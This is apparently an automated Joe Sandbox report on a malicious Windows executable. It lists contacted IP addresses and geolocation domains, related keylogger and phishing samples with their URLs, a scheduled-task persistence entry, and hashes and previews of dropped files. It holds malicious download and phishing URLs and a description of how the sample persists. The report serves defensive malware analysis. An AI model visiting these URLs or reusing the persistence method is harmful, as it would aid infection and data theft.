RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003402000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://reallyfreegeoip.org/xml/file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          188.114.97.3
                                          		reallyfreegeoip.orgEuropean Union
                                          		13335CLOUDFLARENETUSfalse
                                          193.122.130.0
                                          		checkip.dyndns.comUnited States
                                          		31898ORACLE-BMC-31898USfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1583466
                                          Start date and time:2025-01-02 20:18:40 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:file.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@26/12@2/2
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 246
                                          • Number of non-executed functions: 41
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.138, 20.190.160.20, 20.190.160.22, 40.126.32.68, 40.126.32.140, 40.126.32.72, 40.126.32.133, 184.28.90.27, 13.107.246.45, 52.149.20.212
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                          • Execution Graph export aborted for target RegSvcs.exe, PID 7276 because it is empty
                                          • Execution Graph export aborted for target RegSvcs.exe, PID 7620 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • VT rate limit hit for: file.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          14:19:41API Interceptor1x Sleep call for process: file.exe modified
                                          14:19:43API Interceptor12x Sleep call for process: powershell.exe modified
                                          14:19:45API Interceptor1x Sleep call for process: aVmZDnwW.exe modified
                                          14:19:45API Interceptor150x Sleep call for process: RegSvcs.exe modified
                                          20:19:43Task SchedulerRun new task: aVmZDnwW path: C:\Users\user\AppData\Roaming\aVmZDnwW.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          188.114.97.3dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                          • /api/get/free
                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                          • /api/get/free
                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                          • www.rgenerousrs.store/o362/
                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                          • www.beylikduzu616161.xyz/2nga/
                                          Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                          • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                          ce.vbsGet hashmaliciousUnknownBrowse
                                          • paste.ee/d/lxvbq
                                          Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                          • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                          PO 20495088.exeGet hashmaliciousFormBookBrowse
                                          • www.ssrnoremt-rise.sbs/3jsc/
                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • filetransfer.io/data-package/zWkbOqX7/download
                                          http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                          • kklk16.bsyo45ksda.top/favicon.ico
                                          193.122.130.0image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                          • checkip.dyndns.org/
                                          MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                          • checkip.dyndns.org/
                                          rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                          • checkip.dyndns.org/
                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • checkip.dyndns.org/
                                          pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • checkip.dyndns.org/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          reallyfreegeoip.orgPO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                          • 188.114.96.3
                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.96.3
                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 188.114.96.3
                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                          • 188.114.97.3
                                          Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 188.114.96.3
                                          Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 104.21.67.152
                                          INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 172.67.177.134
                                          Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 172.67.177.134
                                          checkip.dyndns.comPO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                          • 158.101.44.242
                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.6.168
                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 132.226.8.169
                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                          • 193.122.130.0
                                          Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 132.226.247.73
                                          ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                          • 158.101.44.242
                                          Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 132.226.247.73
                                          INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 193.122.6.168

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                          • 172.67.157.254
                                          PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                          • 188.114.96.3
                                          https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08okGet hashmaliciousHTMLPhisherBrowse
                                          • 104.18.142.119
                                          https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                          • 104.18.26.193
                                          https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 172.66.0.235
                                          https://bit.ly/3W6tVJJ?BRK=80HiTWCpllGet hashmaliciousUnknownBrowse
                                          • 172.66.0.227
                                          https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63Get hashmaliciousHTMLPhisherBrowse
                                          • 104.26.9.117
                                          https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtmlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.26.9.117
                                          https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.26.9.117
                                          ORACLE-BMC-31898USPO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                          • 158.101.44.242
                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.130.0
                                          Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                          • 140.238.15.187
                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.6.168
                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                          • 193.122.130.0
                                          ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                          • 158.101.44.242
                                          INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 193.122.6.168
                                          armv4l.elfGet hashmaliciousMiraiBrowse
                                          • 129.148.142.134
                                          Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 193.122.6.168

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          54328bd36c14bd82ddaa0c04b25ed9adPO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                          • 188.114.97.3
                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                          • 188.114.97.3
                                          NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                          • 188.114.97.3
                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 188.114.97.3
                                          RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                          • 188.114.97.3
                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                          • 188.114.97.3
                                          Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • 188.114.97.3

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                          Download File
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1039
                                          Entropy (8bit):5.353332853270839
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
                                          MD5:A4AF0F36EC4E0C69DC0F860C891E8BBE
                                          SHA1:28DD81A1EDDF71CBCBF86DA986E047279EF097CD
                                          SHA-256:B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
                                          SHA-512:A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aVmZDnwW.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:8B21C0FDF91680677FEFC8890882FD1F
                                          SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                          SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                          SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:8B21C0FDF91680677FEFC8890882FD1F
                                          SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                          SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                          SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379460230152629
                                          Encrypted:false
                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZLiUyus:fLHyIFKL3IZ2KRH9Oug4Xs
                                          MD5:CFEF7595F28D05D6AC10633476D32EDC
                                          SHA1:EA78EB2879845B0C15EFC69B706E1A35672486F4
                                          SHA-256:E3ABF5038BD35795A993A120EFF207D9D5DF914525E1FA7C229807A74DA35E5D
                                          SHA-512:E1F56D4B92D90BB0ABBB82B315C65DE6785D8742B407E493F813AC55C15382453575B5BB9509709CC5A7F599707ABFBEAE5022A00B0B0E2856FFC3BAE9B98CAC
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l4ff3hq.qky.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fd4eepxz.zh2.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxr4mie.vsv.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4nstqa2.t1l.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1581
                                          Entropy (8bit):5.1054923725815
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6LVxvn:cgergYrFdOFzOzN33ODOiDdKrsuT6/v
                                          MD5:D98D91C46D0BB75226B72B9BA252F7C3
                                          SHA1:38A1246D45028214CD1AE14A5B0FEC91672DC6B4
                                          SHA-256:962680F0399E122AE25E2C328356EF4ED22F02DB5F79E58D58F032868953D9FF
                                          SHA-512:1343B6B74993549984203B058B4B8E2143643556A6E6AC26785BF9C348158770FC9BBE6B04886D1CFAF73D22836A806F6B2F97DE3BAABE0FD7BF7439EA716709
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                          C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1581
                                          Entropy (8bit):5.1054923725815
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6LVxvn:cgergYrFdOFzOzN33ODOiDdKrsuT6/v
                                          MD5:D98D91C46D0BB75226B72B9BA252F7C3
                                          SHA1:38A1246D45028214CD1AE14A5B0FEC91672DC6B4
                                          SHA-256:962680F0399E122AE25E2C328356EF4ED22F02DB5F79E58D58F032868953D9FF
                                          SHA-512:1343B6B74993549984203B058B4B8E2143643556A6E6AC26785BF9C348158770FC9BBE6B04886D1CFAF73D22836A806F6B2F97DE3BAABE0FD7BF7439EA716709
                                          Malicious:false
